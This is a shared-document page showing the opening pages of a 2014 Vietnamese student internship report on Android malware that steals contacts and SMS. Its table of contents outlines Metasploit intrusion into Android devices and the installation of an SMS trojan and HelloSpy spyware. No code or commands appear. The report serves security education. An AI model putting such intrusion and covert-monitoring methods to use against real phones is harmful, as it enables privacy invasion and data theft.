[Báo cáo Thực tập Athena] Nghiên cứu cơ chế routing của Cisco, mô phỏng trên ...
 

More from tuankiet123

Tạo bài viết trên joomla
Tạo bài viết trên joomlaTạo bài viết trên joomla
Tạo bài viết trên joomlatuankiet123
 
Báo cáo giữa kỳ
Báo cáo giữa kỳBáo cáo giữa kỳ
Báo cáo giữa kỳtuankiet123
 
Báo cáo tuần 1
Báo cáo tuần 1Báo cáo tuần 1
Báo cáo tuần 1tuankiet123
 
Báo cáo tuần 1
Báo cáo tuần 1Báo cáo tuần 1
Báo cáo tuần 1tuankiet123
 

More from tuankiet123 (9)

Tạo bài viết trên joomla
Tạo bài viết trên joomlaTạo bài viết trên joomla
Tạo bài viết trên joomla
 
Joomla
JoomlaJoomla
Joomla
 
Báo cáo giữa kỳ
Báo cáo giữa kỳBáo cáo giữa kỳ
Báo cáo giữa kỳ
 
Bai bao cao 4
Bai bao cao 4Bai bao cao 4
Bai bao cao 4
 
Bai bao cao 3
Bai bao cao 3Bai bao cao 3
Bai bao cao 3
 
Bai bao cao 2
Bai bao cao 2Bai bao cao 2
Bai bao cao 2
 
Bai bao cao 2
Bai bao cao 2Bai bao cao 2
Bai bao cao 2
 
Báo cáo tuần 1
Báo cáo tuần 1Báo cáo tuần 1
Báo cáo tuần 1
 
Báo cáo tuần 1
Báo cáo tuần 1Báo cáo tuần 1
Báo cáo tuần 1
 

Recently uploaded

Trích dẫn trắc nghiệm tư tưởng HCM5.docx
Trích dẫn trắc nghiệm tư tưởng HCM5.docxTrích dẫn trắc nghiệm tư tưởng HCM5.docx
Trích dẫn trắc nghiệm tư tưởng HCM5.docxnhungdt08102004
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptx
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptxChàm - Bệnh án (da liễu - bvdlct ctump) .pptx
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptxendkay31
 
Đề cương môn giải phẫu......................
Đề cương môn giải phẫu......................Đề cương môn giải phẫu......................
Đề cương môn giải phẫu......................TrnHoa46
 
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhh
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhhôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhh
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhhvanhathvc
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
powerpoint lịch sử đảng cộng sản việt nam.pptx
powerpoint lịch sử đảng cộng sản việt nam.pptxpowerpoint lịch sử đảng cộng sản việt nam.pptx
powerpoint lịch sử đảng cộng sản việt nam.pptxAnAn97022
 
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...Nguyen Thanh Tu Collection
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...Nguyen Thanh Tu Collection
 
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...Nguyen Thanh Tu Collection
 
Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...
Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...
Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...hoangtuansinh1
 
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...ThunTrn734461
 
sách sinh học đại cương - Textbook.pdf
sách sinh học đại cương   -   Textbook.pdfsách sinh học đại cương   -   Textbook.pdf
sách sinh học đại cương - Textbook.pdfTrnHoa46
 
chuong-7-van-de-gia-dinh-trong-thoi-ky-qua-do-len-cnxh.pdf
chuong-7-van-de-gia-dinh-trong-thoi-ky-qua-do-len-cnxh.pdfchuong-7-van-de-gia-dinh-trong-thoi-ky-qua-do-len-cnxh.pdf
chuong-7-van-de-gia-dinh-trong-thoi-ky-qua-do-len-cnxh.pdfVyTng986513
 
NQA Lợi ích Từ ISO và ESG Tăng Trưởng và Bền Vững ver01.pdf
NQA Lợi ích Từ ISO và ESG Tăng Trưởng và Bền Vững ver01.pdfNQA Lợi ích Từ ISO và ESG Tăng Trưởng và Bền Vững ver01.pdf
NQA Lợi ích Từ ISO và ESG Tăng Trưởng và Bền Vững ver01.pdfNguyễn Đăng Quang
 
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...Nguyen Thanh Tu Collection
 
GIÁO TRÌNH KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
GIÁO TRÌNH  KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘIGIÁO TRÌNH  KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
GIÁO TRÌNH KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘIĐiện Lạnh Bách Khoa Hà Nội
 
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh lí
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh líKiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh lí
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh líDr K-OGN
 

Recently uploaded (20)

Trích dẫn trắc nghiệm tư tưởng HCM5.docx
Trích dẫn trắc nghiệm tư tưởng HCM5.docxTrích dẫn trắc nghiệm tư tưởng HCM5.docx
Trích dẫn trắc nghiệm tư tưởng HCM5.docx
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptx
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptxChàm - Bệnh án (da liễu - bvdlct ctump) .pptx
Chàm - Bệnh án (da liễu - bvdlct ctump) .pptx
 
Đề cương môn giải phẫu......................
Đề cương môn giải phẫu......................Đề cương môn giải phẫu......................
Đề cương môn giải phẫu......................
 
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhh
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhhôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhh
ôn tập lịch sử hhhhhhhhhhhhhhhhhhhhhhhhhh
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
1 - MÃ LỖI SỬA CHỮA BOARD MẠCH BẾP TỪ.pdf
1 - MÃ LỖI SỬA CHỮA BOARD MẠCH BẾP TỪ.pdf1 - MÃ LỖI SỬA CHỮA BOARD MẠCH BẾP TỪ.pdf
1 - MÃ LỖI SỬA CHỮA BOARD MẠCH BẾP TỪ.pdf
 
powerpoint lịch sử đảng cộng sản việt nam.pptx
powerpoint lịch sử đảng cộng sản việt nam.pptxpowerpoint lịch sử đảng cộng sản việt nam.pptx
powerpoint lịch sử đảng cộng sản việt nam.pptx
 
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
TỔNG HỢP ĐỀ THI CHÍNH THỨC KỲ THI TUYỂN SINH VÀO LỚP 10 THPT MÔN NGỮ VĂN NĂM ...
 
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...
Sáng kiến “Sử dụng ứng dụng Quizizz nhằm nâng cao chất lượng ôn thi tốt nghiệ...
 
Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...
Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...
Thong bao 337-DHPY (24.4.2024) thi sat hach Ngoai ngu dap ung Chuan dau ra do...
 
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
QUẢN LÝ HOẠT ĐỘNG GIÁO DỤC KỸ NĂNG SỐNG CHO HỌC SINH CÁC TRƯỜNG TRUNG HỌC CƠ ...
 
sách sinh học đại cương - Textbook.pdf
sách sinh học đại cương   -   Textbook.pdfsách sinh học đại cương   -   Textbook.pdf
sách sinh học đại cương - Textbook.pdf
 
chuong-7-van-de-gia-dinh-trong-thoi-ky-qua-do-len-cnxh.pdf
chuong-7-van-de-gia-dinh-trong-thoi-ky-qua-do-len-cnxh.pdfchuong-7-van-de-gia-dinh-trong-thoi-ky-qua-do-len-cnxh.pdf
chuong-7-van-de-gia-dinh-trong-thoi-ky-qua-do-len-cnxh.pdf
 
NQA Lợi ích Từ ISO và ESG Tăng Trưởng và Bền Vững ver01.pdf
NQA Lợi ích Từ ISO và ESG Tăng Trưởng và Bền Vững ver01.pdfNQA Lợi ích Từ ISO và ESG Tăng Trưởng và Bền Vững ver01.pdf
NQA Lợi ích Từ ISO và ESG Tăng Trưởng và Bền Vững ver01.pdf
 
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
BỘ ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
GIÁO TRÌNH KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
GIÁO TRÌNH  KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘIGIÁO TRÌNH  KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
GIÁO TRÌNH KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
 
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh lí
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh líKiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh lí
Kiểm tra chạy trạm lí thuyết giữa kì giải phẫu sinh lí
 

Báo cáo thực tập cuối kì

  • 1. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 1 BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN KHOA ĐIỆN TỬ - VIỄN THÔNG BÁO CÁO ĐỀ TÀI THỰC TẬP ĐỀ TÀI: NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI  Nơi thực tập : TT.QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ATHENA  Thời gian : 7/7/2014 – 7/9/2014 GVHD : VÕ ĐỖ THẮNG SVTT : NGUYỄN TUẤN KIỆT MSSV : 1120084 TP.HCM, THÁNG 8 NĂM 2014
  • 2. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 2 LỜI CAM ĐOAN Em xin cam đoan:  Những nội dung trong báo cáo này là do em thực hiện dưới sự hướng dẫn trực tiếp của thầy Võ Đỗ Thắng.  Mọi tham khảo dùng trong báo cáo này đều được trích dẫn rõ ràng tên tác giả, tên công trình, thời gian, địa điểm công bố.  Mọi sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, em xin chịu hoàn toàn trách nhiệm. TPHCM, ngày 16 tháng 08 năm 2014 Sinh viên thực tập Nguyễn Tuấn Kiệt
  • 3. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 3 LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG Em xin chân thành cảm ơn trường đại học Khoa học tự nhiên và khoa Điện tử viễn thông đã chỉ dạy những kiến thức nền quý báu, tạo điều kiện cho em hoàn thành tốt đợt thực tập này. Đợt thực tập này đã giúp cho em đúc kết được rất nhiều kinh nghiệm cho bản thân. Những kinh nghiệm này sẽ giúp em hoàn thiện hơn trong công việc và môi trường làm việc sau này. Trong đợt thực tập này, em đã nỗ lực hết mình để có thể đạt được kết quả tốt nhất. Nhưng, bên cạnh đó chắc chắn em không thể tránh khỏi những thiếu sót nhất định. Em rất mong nhận được sự đóng góp, chia sẻ để em có thể làm tốt hơn nữa trong tương lai. Một lần nữa em xin chân thành cảm ơn. TPHCM, ngày 16 tháng 08 năm 2014 Sinh viên thực tập Nguyễn Tuấn Kiệt
  • 4. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 4 LỜI CẢM ƠN TRUNG TÂM ATHENA Em xin cảm ơn Trung tâm đào tạo Quản trị mạng và An ninh mạng quốc tế Athena, cùng các anh chị trong công ty. Đặc biệt, em xin chân thành cảm ơn thầy Võ Đỗ Thắng đã nhiệt tình giúp đỡ và hướng dẫn em trong suốt thời gian thực tập tại trung tâm. Thầy đã tạo mọi điều kiện thuận lợi, cung cấp những kiến thức cần thiết cũng như đóng góp những ý kiến quý báu để em hoàn thành tốt bài báo cáo này. Một lần nữa em xin chân thành cảm ơn. TPHCM, ngày 16 tháng 08 năm 2014 Sinh viên thực tập Nguyễn Tuấn Kiệt Thầy Võ Đỗ Thắng (bên trái) cùng SVTT Nguyễn Tuấn Kiệt (bên phải)
  • 5. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 5 NHẬN XÉT CỦA KHOA .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. TPHCM, ngày ... tháng ... năm 2014 Chủ nhiệm khoa
  • 6. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 6 NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. .............................................................................................................................................. TPHCM, ngày ... tháng ... năm 2014 Giáo viên hướng dẫn
  • 7. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 7 LỜI GIỚI THIỆU Số lượng các báo cáo về nguy cơ an ninh trên các thiết bị di động Android từ các công ty nghiên cứu bảo mật gia tăng cho thấy hệ điều hành này đang là đích nhắm cho tin tặc cùng các phần mềm độc hại. Không quá khó khăn và cũng không cần thiết phải có những nghiên cứu chi tiết để nhận ra rằng hệ điều hành Android đang bị tấn công nhiều hơn. Chỉ cần nhìn vào trường hợp facebook, khi mạng xã hội này trở nên nổi tiếng và có số lượng người dùng đông đảo, lập tức nó trở thành đích ngắm của các tin tặc. Giới tội phạm mạng luôn tìm mọi cách để lợi dụng các lỗ hổng bảo mật của những hệ điều hành được cài đặt trên số đông thiết bị. Và điểm yếu cố hữu trong an ninh bảo mật vẫn nằm ở người dùng rồi mới đến thiết bị. Các nhà nghiên cứu bảo mật cho biết hiện có quá nhiều người dùng Android bất cẩn luôn tải về ứng dụng mà không thèm kiểm tra tìm hiểu trước xem chúng có an toàn hay không. Vậy để biết thêm phần nào về cách thức mà các tin tặc tấn công các thiết bị Android đồng thời để hạn chế được điều này, em xin mời thầy và các bạn cùng đi đến bài báo cáo của em.
  • 8. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 8 Mục lục PHẦN 1: GIỚI THIỆU VỀ NƠI THỰC TẬP ............................................................................... 11 1. Giới thiệu về Trung tâm Athena............................................................................................. 11 2. Trụ sở và các chi nhánh .......................................................................................................... 11 3. Quá trình hình thành và phát triển .......................................................................................... 12 3.1. Quá trình hình thành ........................................................................................................ 12 3.2. Quá trình phát triển.......................................................................................................... 13 3.3. Cơ cấu tổ chức ................................................................................................................. 14 4. Tình hình hoạt động trong năm 2011...................................................................................... 15 4.1. Cơ cấu sản phẩm.............................................................................................................. 15 4.1.1. Các khóa học dài hạn................................................................................................ 15 4.1.2. Các khóa học ngắn hạn............................................................................................. 15 4.1.2.1. Khóa Quản trị mạng.............................................................................................. 15 4.1.2.2. Khóa thiết kế web và bảo mật mạng..................................................................... 15 4.1.2.3. Các sản phẩm khác................................................................................................. 15 5. Chiến lược Marketing của Trung tâm Athena ........................................................................ 16 5.1. Chiến lược sản phẩm ....................................................................................................... 16 5.2. Chiến lược tập hợp sản phẩm: ......................................................................................... 16 5.3. Chiến lược dòng sản phẩm: ............................................................................................. 17 PHẦN 2: BÁO CÁO ĐỀ TÀI........................................................................................................ 18 1. Giới thiệu về Android ............................................................................................................. 18 1.1. Android là gì? .................................................................................................................. 18 1.2. Lịch sử phát triển Anroid................................................................................................. 18 1.3. Đặt điểm của Android...................................................................................................... 19 1.3.1. Tính mở .................................................................................................................... 19 1.3.2. Tính ngang bằng của các ứng dụng.......................................................................... 19 1.3.3. Phá vỡ rào cản phát triển ứng dụng.......................................................................... 19 1.3.4. Xây dựng ứng dụng dễ dàng và nhanh chóng .......................................................... 19 1.4. Các phiên bản của android............................................................................................... 20 1.5. Tỷ lệ sử dụng các phiên bản android............................................................................... 22 1.6. So sánh android 2.3 (Gingerbread) và android 4.x (4.0 – Ice Cream Sandwich):........... 22 1.6.1. Sự khác nhau về yêu cầu phần cứng cần thiết để cài đặt............................................. 23
  • 9. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 9 1.6.2. Sự khác nhau về giao diện......................................................................................... 23 1.6.3. Sự khác nhau về tính năng......................................................................................... 25 1.6.4. Sự khác nhau về giao thức mạng................................................................................ 25 2. Nghiên cứu về mã độc trong mỗi trường android................................................................... 26 2.1. Malware là gì? ................................................................................................................. 26 2.2. Phân loại .......................................................................................................................... 27 2.3. Cơ chế hoạt động của Malware ....................................................................................... 27 2.4. Mục đích của Malware DroidDream ............................................................................... 28 2.5. Dấu hiệu bị nhiễm các phần mềm độc hại....................................................................... 28 3. Xâm nhập android qua mạng local ......................................................................................... 29 3.1. Giới thiệu về Kali Linux.................................................................................................. 29 3.1.1. Kali phát triển trên nền tảng hệ điều hành Debian................................................... 29 3.1.2. Hỗ trợ mạng không dây tốt hơn................................................................................ 29 3.1.3. Khả năng tùy biến cao.............................................................................................. 29 3.1.4. Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai ..................................... 30 3.2. Cài đặt Kali Linux........................................................................................................ 30 3.3. Metasploit framework trong Kali linux........................................................................... 40 3.3.1. Giới thiệu.................................................................................................................. 40 3.3.2. Sử dụng metasploit framework ................................................................................ 40 3.4. Tấn công android dùng Metasploit Framework trong Kali Linux................................... 42 4. Thực hiện xâm nhập android thông qua mạng Internet .......................................................... 49 4.1. Giới thiệu về VPS............................................................................................................ 49 4.1.1. VPS là gì?................................................................................................................. 49 4.1.2. Đặc điểm về thông số VPS....................................................................................... 50 4.1.3. Giá trị khi sử dụng VPS ........................................................................................... 50 4.2. Cài đặt metasploit ............................................................................................................ 51 4.3. Xâm nhập vào thiết bị android......................................................................................... 57 5. Cài đặt SMS Trojan dùng iCalender....................................................................................... 67 5.1. Cài đặt máy ảo android AVD Manager.............................................................................. 67 5.1.1. Cài đặt JDK:............................................................................................................. 67 5.1.2. Cài đặt android SDK ................................................................................................ 68 5.1.3. Cài đặt máy ảo android ................................................................................................ 69
  • 10. Báo cáo thực tập GVHD: Võ Đỗ Thắng SVTT: Nguyễn Tuấn Kiệt - 1120084 Trang 10 5.2. Cài SMS Trojan vào máy android ảo................................................................................. 71 5.2.1. Các công cụ cần thiết ................................................................................................. 71 5.2.2. Các bước thực hiện................................................................................................... 72 6. Tìm hiểu về HelloSpy để theo dõi thiết bị android................................................................. 79 6.1. HelloSpy là gì? ................................................................................................................ 79 6.2. Tính năng của HelloSpy .................................................................................................. 79 6.2.1. Truy cập từ xa:.......................................................................................................... 79 6.2.2. Theo dõi các tin nhắn WhatsApp (không có rễ):...................................................... 79 6.2.3. Theo dõi lịch sử Internet: ......................................................................................... 79 6.2.4. Spy cuộc gọi ghi âm:................................................................................................ 79 6.2.5. Theo dõi tất cả bắt hình ảnh: .................................................................................... 79 6.2.6. Kiểm soát các ứng dụng và chương trình:................................................................ 79 6.2.7. Theo dõi tin nhắn SMS:............................................................................................ 80 6.2.8. Theo dõi Viber, facebook và yahoo thông điệp: ...................................................... 80 6.2.9. GPS Tracking: .......................................................................................................... 80 6.2.10. Lịch sử màn hình cuộc gọi: ...................................................................................... 80 6.3. Cài đặt HelloSpy.............................................................................................................. 80 7. Tổng kết .................................................................................................................................. 85 8. Kinh nghiệm đạt được sau đợt thực tập .................................................................................. 86 9. Các link báo báo...................................................................................................................... 87 10. Các link tham khảo.................................................................................................................. 88
